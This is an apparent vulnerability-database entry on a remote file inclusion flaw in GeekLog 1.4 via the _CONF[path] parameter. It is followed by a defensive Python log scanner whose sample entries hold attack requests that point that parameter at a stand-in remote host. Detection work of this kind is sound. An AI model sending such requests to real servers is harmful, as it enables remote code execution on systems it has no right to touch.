Exploitation Summary
EIP tracks 1 public exploit for CVE-2006-6225. PoCs published by Kw3[R]Ln.
AI-analyzed exploit summary
This is a writeup describing a remote file inclusion vulnerability in GeekLog <= 1.4.0 caused by the unsanitized $_CONF[path] variable when register_globals is enabled. It provides multiple exploit URLs but no actual exploit code.
Description
Multiple PHP remote file inclusion vulnerabilities in GeekLog 1.4 allow remote attackers to execute arbitrary code via a URL in the _CONF[path] parameter to (1) links/functions.inc, (2) polls/functions.inc, (3) spamx/BlackList.Examine.class.php, (4) spamx/DeleteComment.Action.class.php, (5) spamx/EditIPofURL.Admin.class.php, (6) spamx/MTBlackList.Examine.class.php, (7) spamx/MassDelete.Admin.class.php, (8) spamx/MailAdmin.Action.class.php, (9) spamx/MassDelTrackback.Admin.class.php, (10) spamx/EditHeader.Admin.class.php, (11) spamx/EditIP.Admin.class.php, (12) spamx/IPofUrl.Examine.class.php, (13) spamx/Import.Admin.class.php, (14) spamx/LogView.Admin.class.php, and (15) staticpages/functions.inc, in the plugins/ directory.
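A defender-side check for the request pattern in the description above, added here as an example (not code from the original page or from GeekLog): it flags access-log entries that request one of the 15 listed scripts with a URL in _CONF[path]. The combined log format, the function names and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The 15 scripts under plugins/ listed in the CVE-2006-6225 description.
SPAMX = ("BlackList.Examine DeleteComment.Action EditIPofURL.Admin "
         "MTBlackList.Examine MassDelete.Admin MailAdmin.Action "
         "MassDelTrackback.Admin EditHeader.Admin EditIP.Admin "
         "IPofUrl.Examine Import.Admin LogView.Admin").split()
TARGETS = {f"/plugins/{p}/functions.inc" for p in ("links", "polls", "staticpages")}
TARGETS |= {f"/plugins/spamx/{name}.class.php".lower() for name in SPAMX}

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request line of a log entry
REMOTE = re.compile(r"\s*(?:https?|ftps?)://", re.I)  # a URL rather than a local path

def is_rfi_attempt(log_line):
    """True if the entry requests a listed script with a URL in _CONF[path]."""
    m = REQUEST.search(log_line)
    if not m:
        return False
    try:
        target = urlsplit(m.group(1))
    except ValueError:  # malformed request target
        return False
    path = unquote(target.path).lower()
    if not any(path.endswith(t) for t in TARGETS):
        return False
    # parse_qsl percent-decodes names and values, so _CONF%5Bpath%5D is caught too.
    return any(name == "_CONF[path]" and REMOTE.match(value)
               for name, value in parse_qsl(target.query, keep_blank_values=True))

def flagged(lines):
    """Client addresses (first log field) of the entries that match."""
    return [line.split()[0] for line in lines if is_rfi_attempt(line)]

# Constructed sample entries (documentation addresses and hosts), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2006:10:00:00 +0000] "GET /geeklog/plugins/links/'
    'functions.inc?_CONF[path]=http://host.example/x HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Dec/2006:10:00:05 +0000] "GET /plugins/spamx/Import.Admin'
    '.class.php?_CONF%5Bpath%5D=ftp%3A%2F%2Fhost.example%2F HTTP/1.0" 200 0',
    '192.0.2.12 - - [01/Dec/2006:10:00:09 +0000] "GET /plugins/polls/functions.inc'
    '?_CONF[path]=/var/www/geeklog/ HTTP/1.1" 200 0',  # local path: not flagged
    '192.0.2.13 - - [01/Dec/2006:10:00:12 +0000] "GET /index.php'
    '?topic=http://host.example/ HTTP/1.1" 200 900',   # unrelated script: not flagged
]

if __name__ == "__main__":
    print(flagged(SAMPLE_LOG))
```

Access logs record only the query string; with register_globals enabled the same variable can also arrive in a POST body or cookie, which this check does not see.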